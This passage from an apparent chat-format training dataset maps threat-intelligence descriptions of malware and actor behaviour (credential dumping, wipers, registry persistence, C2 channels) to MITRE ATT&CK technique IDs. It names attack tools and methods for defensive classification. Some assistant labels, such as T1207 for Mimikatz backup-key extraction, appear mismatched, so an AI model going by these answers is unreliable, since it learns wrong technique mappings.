- "content": "secretsdump.py: Performs various techniques to dump secrets from the remote machine without executing any agent there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. mimikatz.py: Mini shell to control a remote mimikatz RPC server developed by @gentilkiwi"
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets', 'T1003.002 - OS Credential Dumping: Security Account Manager', 'T1003.003 - OS Credential Dumping: NTDS', 'T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has sent malicious links to victims through email campaigns."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "actors used compromised credentials for the victim's endpoint management platform, Altiris, to move laterally."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry: DisableAttachmentsInPV DisableInternetFilesInPV DisableUnsafeLocationsInPV Figure 15: Disabling Microsoft Office Protected View Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects OS version information such as registered owner details, manufacturer details, processor type, available storage, installed patches, hostname, version info, system date, and other system information by using the commands systeminfo, net config workstation, hostname, ver, set, and date /t."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors obtained files and data from the compromised network."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has modified Registry settings for default file associations to enable all macros and for persistence."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Impersonation using Kerberos pass-the-ticket attacks (Mimikatz PowerShell) - Email extraction from the MS Exchange Server using compromised credentials - Archiving sensitive information - Data exfiltration via legitimate cloud services - Secure file deletion"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1550.003 - Use Alternate Authentication Material: Pass the Ticket', 'T1114.002 - Email Collection: Remote Email Collection', 'T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has used wmi queries to gather information from the system."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NanoCore can modify the victim's firewall."
- },
- {
- "role": "assistant",
- "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Penquin can use Cron to create periodic and pre-scheduled background jobs."
- },
- {
- "role": "assistant",
- "content": "T1053.003 - Scheduled Task/Job: Cron"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SMOKEDHAM has created user accounts and added them to local Admin groups."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RedLeaves can delete specified files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The role of Torisma is to monitor for new drives added to the system as well as remote desktop connections. This appears to be a more specialized implant focused on active monitoring on a victim’s system and triggering the execution of payloads based on monitored events. The end objective of Torisma is executing shellcode on the victim’s system and sending the results back to the C2"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex has collected a list of installed software on the system."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This is encrypted by RC4, using the key {0xb5, 0x78, 0x62, 0x52, 0x98, 0x3e, 0x24, 0xd7, 0x3b, 0xc6, 0xee, 0x7c, 0xb9, 0xed, 0x91, 0x62}"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "menuPass has used the Microsoft administration tool csvde.exe to export Active Directory data."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can collect the computer name from the machine,."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file destruction algorithm is composed of two stages: a first stage to overwrite files and another to destroy the physical disk layout and the partition tables along with it. For the file destruction, it takes ownership of the files by modifying their ACL entries after it has obtained the 'SeTakeOwnershipPrivilege'. A file found will then simply be overwritten with zeros. This is done for the next 23 drives alphabetically (through \"Z:\\\"). On the second stage, the wiper attempts to set the drive layout of all the physical drives on the system numbered 9 to 0. This will wipe out all extended information about the physical drive's partitions including MBR, GPT and partition entries. Destroying the start of the files and the partitions tables is a common technique seen on other wipers, and its highly effective in preventing the file recovery"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete stores files and logs in a folder on the local drive."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. We don't have hard evidence of how Suckfly obtained information on the targeted user, but we did find a large open-source presence on the initial target. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. While we know the attackers used a custom dropper to install the back door, we do not know the delivery vector. Based on the amount of open-source information available on the target, it is feasible that a spear-phishing email may have been used. We found evidence that Suckfly used hacktools to move latterly and escalate privileges. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LightNeuron uses SMTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We mentioned earlier that due to the nature of the IE injection technique used by the HTTP-based backdoors, a number of C2 commands were cached to disk"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA performs a reflective DLL injection using a given pid."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can download additional files and tools from its C2 server, including through the use of BITSAdmin."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has downloaded additional scripts, malware, and tools onto a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Falcon Intelligence has observed two different methods used to deploy BitPaymer once the domain controllers are compromised. In one instance, only the domain controllers and other critical infrastructure, like payroll servers, were targeted and PowerShell Empire was used to download and execute the BitPaymer malware directly on these servers"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has replaced .dockerd and .dockerenv with their own scripts and cryptocurrency mining software."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Twitter as a backup C2 method. It also has a module designed to post messages to the Russian VKontakte social media site."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "\"beacon\" payload can receive C2 from one protocol and respond on another. This is typically a mixture of HTTP, HTTPS, and DNS traffic."
- },
- {
- "role": "assistant",
- "content": "T1026 - Multiband Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk deletes Application, Security, Setup, and System Windows Event Logs."
- },
- {
- "role": "assistant",
- "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FinFisher uses DLL side-loading to load malicious programs."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 modified timestamps of backdoors to match legitimate Windows files."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Although the targeting profile is the same as the Russian banking cluster, the TTPs are very different. In particular, the use of tooling stands out from other clusters of CARBON SPIDER activity. As with other clusters, the primary infection vector is targeted spear phishing emails that use exploits for a variety of vulnerabilities in Microsoft Office:"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution', 'T1588.006 - Vulnerabilities', 'T1566 - Phishing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses to clean up the environment and attempt to prevent detection."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A JPIN variant downloads the backdoor payload via the BITS service."
- },
- {
- "role": "assistant",
- "content": "T1197 - BITS Jobs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Saint Bot has been packed using a dark market crypter."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The usage of LinkedIn to deliver malicious documents,"
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Configuration Config.ini is the file where the malware stores its encrypted configuration data"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT uses HTTP and HTTPS to communicate with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can deobfuscate the base64-encoded and AES-encrypted files downloaded from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can mark its binary code for deletion after reboot."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silent Librarian has used compromised credentials to obtain unauthorized access to online accounts."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects information about running processes from victims."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NOKKI has downloaded a remote module for execution."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It appears to us that one organization had its entire Active Directory dumped out, making up most of the credentials we found in the data dump"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As we discover new tools used by this group, we have consistently discovered overlapping artifacts with previously used tools and infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments."
- },
- {
- "role": "assistant",
- "content": "T1195.002 - Compromise Software Supply Chain"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can be configured to spread via removable drives."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used compromised credentials to access other systems on a victim network."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHA256 Compiled C2 account POP3S Account SMTPS Accounts 861b6bc1f9."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Blue Mockingbird has used Remote Desktop to log on to servers interactively and manually copy files to remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses multiple protocols (HTTPS, HTTP, DNS) for its C2 server as fallback channels if communication with one is unsuccessful."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 will identify Microsoft Office documents on the victim's computer."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If an attacker has domain admin permissions, he can steal the DC backup key and as a result, decrypt all the domain users’ master keys. The Mimikatz module allowing to extract the domain backup key is lsadump::backupkeys. This module first calls the API functions LsaOpenPolicy with POLICY_GET_PRIVATE_INFORMATION as the DesiredAccess argument, so it will be able to call the function LsaRetrievePrivateData after-"
- },
- {
- "role": "assistant",
- "content": "T1207 - Rogue Domain Controller"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer can execute a task to download a file."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Basic system enumeration – The script collects the Windows OS version, computer name, and the contents of a file Ni.txt in $APPDATA path; the file is presumably created and filled by different modules that will be downloaded by the main module"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Misdat has created registry keys for persistence, including `HKCU\\Software\\dnimtsoleht\\StubPath`, `HKCU\\Software\\snimtsOleht\\StubPath`, `HKCU\\Software\\Backtsaleht\\StubPath`, `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed. Components\\{3bf41072-b2b1-21c8-b5c1-bd56d32fbda7}`, and `HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{3ef41072-a2f1-21c8-c5c1-70c2c3bc7905}`."
- },
- {
- "role": "assistant",
- "content": "T1547 - Boot or Logon Autostart Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nomadic Octopus attempted to make Octopus appear as a Telegram Messenger with a Russian interface."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to open a remote shell and run basic commands."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions"
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This INI file is parsed to determine what Comnie should do. Comnie allows the attacker to provide and subsequently execute a batch script (BAT), executable file (EXE), or dynamic-link library (DLL). Using this example, Comnie will then request data to supply to the BAT script, via the following decrypted request: h=HOSTNAME-PC&f=gethostinfo.bat&c=& Based on network traffic witnessed, the remote C2 server was found to respond with the following information"
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several BRONZE BUTLER tools encode data with base64 when posting it to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bankshot identifies processes and collects the process ids."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites."
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dedicated methods resolve additional strings and API calls at runtime, rendering the PE even more difficult to analyze. Below is an example of the method responsible for resolving the .bazar domains. It loads an obfuscated string, and deobfuscates it using the first character of the domain name as a XOR key for the rest of the string"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a command to edit the Registry on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
